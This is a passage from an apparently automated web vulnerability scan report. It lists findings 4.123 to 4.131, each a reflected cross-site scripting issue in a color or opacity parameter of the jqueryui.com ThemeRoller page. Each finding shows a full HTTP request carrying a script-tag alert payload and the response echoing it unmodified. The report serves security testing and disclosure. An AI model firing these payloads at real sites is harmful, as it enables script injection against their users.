666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefaul
...[SNIP]...

4.123. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ede7"><script>alert(1)</script>8a535ef4e7f was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderCol
...[SNIP]...

4.124. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af686"><script>alert(1)</script>36e7921bdd9 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverla
...[SNIP]...

4.125. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42612"><script>alert(1)</script>8e5b70fa715 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
heet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a82842612"><script>alert(1)</script>8e5b70fa715&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent
...[SNIP]...

4.126. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7e59"><script>alert(1)</script>5ae29252980 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45ca7e59"><script>alert(1)</script>5ae29252980&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgI
...[SNIP]...

4.127. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ce5"><script>alert(1)</script>6c8eb05e3fb was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Content=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce57ce5"><script>alert(1)</script>6c8eb05e3fb&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive
...[SNIP]...

4.128. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b933"><script>alert(1)</script>c75e71b9a99 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=6666663b933"><script>alert(1)</script>c75e71b9a99&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopSh
...[SNIP]...

4.129. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68ae"><script>alert(1)</script>8316832d0b1 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000f68ae"><script>alert(1)</script>8316832d0b1&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.130. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f2"><script>alert(1)</script>1ea11700b86 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65b40f2"><script>alert(1)</script>1ea11700b86&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636
...[SNIP]...

4.131. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3cd4"><script>alert(1)</script>c1869e1c15c was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:52 GMT
Content-Type: text/html
